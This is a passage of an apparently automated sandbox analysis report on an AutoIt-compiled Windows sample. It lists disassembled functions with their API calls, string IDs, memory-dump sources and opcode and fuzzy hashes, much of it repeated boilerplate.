                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                            • API String ID: 4237274167-1221869570
                                                                                                                            • Opcode ID: 5456cb1bd3d2115c41383ca987dc23d425d4e6228eb66b988dd00827b1d8f0c2
                                                                                                                            • Instruction ID: 9598322187ed1eedca964233d7f44bfc65eefec174e780e174b83873b3701cea
                                                                                                                            • Opcode Fuzzy Hash: 5456cb1bd3d2115c41383ca987dc23d425d4e6228eb66b988dd00827b1d8f0c2
                                                                                                                            • Instruction Fuzzy Hash: FA91BF71A08345DFC700DF25C48095ABBE4EF89355F04492DF99AAB362DB31ED0ADB92
                                                                                                                            Function 00F42A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EFFC86: _wcscpy.LIBCMT ref: 00EFFCA9
                                                                                                                            • _memset.LIBCMT ref: 00F42B87
                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F42BB6
                                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F42C69
                                                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F42C97
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 4152858687-4108050209
                                                                                                                            • Opcode ID: fc3d136a6051d6a625c5b4c3461f5588b7153afb1e6ccb328b99bf2adecbfe0a
                                                                                                                            • Instruction ID: 8a39f3768abffa707ce4ae70d36eb64b9012fe77ca915e2c8c95e96f81efd1f6
                                                                                                                            • Opcode Fuzzy Hash: fc3d136a6051d6a625c5b4c3461f5588b7153afb1e6ccb328b99bf2adecbfe0a
                                                                                                                            • Instruction Fuzzy Hash: B451BD71A083019AD7A49E28D885B6FBBE4EF89330F440A39FD95D32D1DB64CD44B762
                                                                                                                            Function 00EF3137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$_free
                                                                                                                            • String ID: 3c$_
                                                                                                                            • API String ID: 2620147621-4099079164
                                                                                                                            • Opcode ID: bf924e5707f7bc6070c500e78cc85caa14bf12f7f87f5bccd3bbdcc862dab39f
                                                                                                                            • Instruction ID: cf5a16cba87a178ff041864ad98231a7e099cc942ab76be622b98db37a3305ea
                                                                                                                            • Opcode Fuzzy Hash: bf924e5707f7bc6070c500e78cc85caa14bf12f7f87f5bccd3bbdcc862dab39f
                                                                                                                            • Instruction Fuzzy Hash: 72516B71A047458FDB25CF28C841B6EBBE5AF85314F04582DEA99E7351DB31E901CB52
                                                                                                                            Function 00EF6192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$_memmove
                                                                                                                            • String ID: 3c$ERCP
                                                                                                                            • API String ID: 2532777613-1756721700
                                                                                                                            • Opcode ID: e0d57d8b824929546fc39f213ac16be4146ca212ca79b2966188a0d110416eaf
                                                                                                                            • Instruction ID: 11640314c3834b2f0ebc9a3592e5808d48985455cc39d1a770b1eb22e4f2eb3d
                                                                                                                            • Opcode Fuzzy Hash: e0d57d8b824929546fc39f213ac16be4146ca212ca79b2966188a0d110416eaf
                                                                                                                            • Instruction Fuzzy Hash: 7751A171A00309DBEB24CF65C881BBAB7F4EF44314F20456EE94ADB291EB70EA44DB50
                                                                                                                            Function 00F3D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F3D5D4
                                                                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F3D60A
                                                                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F3D61B
                                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F3D69D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                            • String ID: DllGetClassObject
                                                                                                                            • API String ID: 753597075-1075368562
                                                                                                                            • Opcode ID: e4bb1ead1c8625e4d06378e303afb51c1a7b38f02780c1c677eacf5eb86f6b41
                                                                                                                            • Instruction ID: 4f1283818c7e2928ede8055e091972b6f8a79fa9af8358ea0b745eed4083ee45
                                                                                                                            • Opcode Fuzzy Hash: e4bb1ead1c8625e4d06378e303afb51c1a7b38f02780c1c677eacf5eb86f6b41
                                                                                                                            • Instruction Fuzzy Hash: 56419FB1600204EFDB05DF64E885B9A7BB9EF44324F1581AAFC199F205D7B1DD44EBA0
                                                                                                                            Function 00F42753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00F427C0
                                                                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F427DC
                                                                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00F42822
                                                                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FA5890,00000000), ref: 00F4286B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Delete$InfoItem_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 1173514356-4108050209
                                                                                                                            • Opcode ID: 32dc8ddfbd83160bdb06e949853035f924777845c03ccb411b966b80872fa346
                                                                                                                            • Instruction ID: cc22987404145cfb87259cece8da649faa3e11f2c5d5f69c9b2327dad418367e
                                                                                                                            • Opcode Fuzzy Hash: 32dc8ddfbd83160bdb06e949853035f924777845c03ccb411b966b80872fa346
                                                                                                                            • Instruction Fuzzy Hash: 5241AE716043419FD760DF24CC44B2ABFE8EF85324F444A7EF8A697292DB74A805DB62
                                                                                                                            Function 00F5D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F5D7C5
                                                                                                                              • Part of subcall function 00EE784B: _memmove.LIBCMT ref: 00EE7899
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharLower_memmove
                                                                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                                                                            • API String ID: 3425801089-567219261
                                                                                                                            • Opcode ID: dc3b219ea7b5eca41f573cd1b0a8b1ef1fff74e802a2a636e736129d1f4ac631
                                                                                                                            • Instruction ID: 637de683fa6ac599060a634e48bf66f4a4b06871601a0214b9a5abf6bed311cd
                                                                                                                            • Opcode Fuzzy Hash: dc3b219ea7b5eca41f573cd1b0a8b1ef1fff74e802a2a636e736129d1f4ac631
                                                                                                                            • Instruction Fuzzy Hash: AA31D271A04219ABDF10EF59CC419EEB3F5FF14321F008629E866A72D2DB71AD09DB80
                                                                                                                            Function 00F38E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                              • Part of subcall function 00F3AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F3AABC
                                                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F38F14
                                                                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F38F27
                                                                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00F38F57
                                                                                                                              • Part of subcall function 00EE7BCC: _memmove.LIBCMT ref: 00EE7C06
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$_memmove$ClassName
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 365058703-1403004172
                                                                                                                            • Opcode ID: ae128228b8cb1a1927a372d5fe55774c13eb5f5d0cff020922711c68d1870dda
                                                                                                                            • Instruction ID: 2c9f2a5179b93a030e580af83c4191cc53e4ad8cfa6078f0688db4b6c5cb20c4
                                                                                                                            • Opcode Fuzzy Hash: ae128228b8cb1a1927a372d5fe55774c13eb5f5d0cff020922711c68d1870dda
                                                                                                                            • Instruction Fuzzy Hash: F821F072A04208BADB14ABB1DC85DFEB7A9DF453B0F144129F421A71E1DF39490AB620
                                                                                                                            Function 00F5182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F5184C
                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F51872
                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F518A2
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00F518E9
                                                                                                                              • Part of subcall function 00F52483: GetLastError.KERNEL32(?,?,00F51817,00000000,00000000,00000001), ref: 00F52498
                                                                                                                              • Part of subcall function 00F52483: SetEvent.KERNEL32(?,?,00F51817,00000000,00000000,00000001), ref: 00F524AD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3113390036-3916222277
                                                                                                                            • Opcode ID: 10af4075880510813c25a53744088ad477a3c5cf42f11703e62880b563585bf1
                                                                                                                            • Instruction ID: 9f2ecf4e1315353ba5633ef7d343e76de1a8bdc7df0f2e2bb833c8e10d07d843
                                                                                                                            • Opcode Fuzzy Hash: 10af4075880510813c25a53744088ad477a3c5cf42f11703e62880b563585bf1
                                                                                                                            • Instruction Fuzzy Hash: 2F21AFB550020CBFEB219B609C85FBB76ADFB49756F10412AFA0596240DA64AD0877A0
                                                                                                                            Function 00F663E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EE1D73
                                                                                                                              • Part of subcall function 00EE1D35: GetStockObject.GDI32(00000011), ref: 00EE1D87
                                                                                                                              • Part of subcall function 00EE1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EE1D91
                                                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F66461
                                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 00F66468
                                                                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F6647D
                                                                                                                            • DestroyWindow.USER32(?), ref: 00F66485
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                            • String ID: SysAnimate32
                                                                                                                            • API String ID: 4146253029-1011021900
                                                                                                                            • Opcode ID: 4995f232b31cc8b51b013146d286ebedf6df1e95da69e06185f7f63a53443710
                                                                                                                            • Instruction ID: a90f211e673c9a340a72907393b944b9699a865a3bf54d5ee4cfc6e0a6c4d386
                                                                                                                            • Opcode Fuzzy Hash: 4995f232b31cc8b51b013146d286ebedf6df1e95da69e06185f7f63a53443710
                                                                                                                            • Instruction Fuzzy Hash: AD215B71600209BBEF108F64EC81EBA77ADEB59778F104629FA20D3191DB76DC51B760
                                                                                                                            Function 00F46D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00F46DBC
                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F46DEF
                                                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00F46E01
                                                                                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F46E3B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateHandle$FilePipe
                                                                                                                            • String ID: nul
                                                                                                                            • API String ID: 4209266947-2873401336
                                                                                                                            • Opcode ID: d405e8fad11e4eedc332eb5ba9d434e03c3cde910ecab00ba2b05f938ee4949e
                                                                                                                            • Instruction ID: ffcb349e90809896b00ee07144a09541f5aff6c885aea72fdcba29370f7cd51b
                                                                                                                            • Opcode Fuzzy Hash: d405e8fad11e4eedc332eb5ba9d434e03c3cde910ecab00ba2b05f938ee4949e
                                                                                                                            • Instruction Fuzzy Hash: 7E21B075A00209ABDB209F29DC44A9A7FF4EF46730F204A29FDA0D72D0DB709855AB56
                                                                                                                            Function 00F46E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00F46E89
                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F46EBB
                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00F46ECC
                                                                                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00F46F06
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateHandle$FilePipe
                                                                                                                            • String ID: nul
                                                                                                                            • API String ID: 4209266947-2873401336
                                                                                                                            • Opcode ID: 1e09e41b19f0db0f7e498baa3181090a499345b062433d49f4cb0a6e95ec8385
                                                                                                                            • Instruction ID: b7ecd47eecc986564bbcaeecf2131cd2afeac2cbc5c642fe850068996604110f
                                                                                                                            • Opcode Fuzzy Hash: 1e09e41b19f0db0f7e498baa3181090a499345b062433d49f4cb0a6e95ec8385
                                                                                                                            • Instruction Fuzzy Hash: 6B21B379A003059BDB209F69DC44A9A7BE8EF46730F200A19FDB0D72D0D7B0E855EB56
                                                                                                                            Function 00F4AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00F4AC54
                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F4ACA8
                                                                                                                            • __swprintf.LIBCMT ref: 00F4ACC1
                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F6F910), ref: 00F4ACFF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                            • String ID: %lu
                                                                                                                            • API String ID: 3164766367-685833217
                                                                                                                            • Opcode ID: b360bf4933f94109fa4b5459ccd3417175f1e5be1aae16681c4a2ba5c3549570
                                                                                                                            • Instruction ID: 5a1a22ab37a4594b346b3d85f3192093f93f1a9c0020ad6fd6bc3c07e64b3804
                                                                                                                            • Opcode Fuzzy Hash: b360bf4933f94109fa4b5459ccd3417175f1e5be1aae16681c4a2ba5c3549570
                                                                                                                            • Instruction Fuzzy Hash: 72216D31A0010DAFCB10DF65DD85DEE7BF8FF89314B004069F909AB252DA71EA45EB21
                                                                                                                            Function 00F41AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00F41B19
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharUpper
                                                                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                            • API String ID: 3964851224-769500911
                                                                                                                            • Opcode ID: 8e4d2a801c3149eb4b323564b760806ed9a03aa08dcdc56c42f2551388cc341f
                                                                                                                            • Instruction ID: 2c5096d41268f6097fcd3d75d0f642a3616e04472e9c5b038e0338646d96b362
                                                                                                                            • Opcode Fuzzy Hash: 8e4d2a801c3149eb4b323564b760806ed9a03aa08dcdc56c42f2551388cc341f
                                                                                                                            • Instruction Fuzzy Hash: A8113C319102488BCF00EF64D851AEEB7B5FF66314F144469DC15A7292EB325D0AEB50
                                                                                                                            Function 00F5EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F5EC07
                                                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F5EC37
